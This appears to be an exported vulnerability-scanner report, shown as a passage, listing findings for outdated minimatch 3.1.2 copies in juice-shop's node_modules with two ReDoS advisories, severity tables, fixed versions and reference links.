minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 136: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 137: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/file-js/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 138: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/fstream/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 139: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 140: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 141: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/rimraf/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 142: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 143: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 144: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 145: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
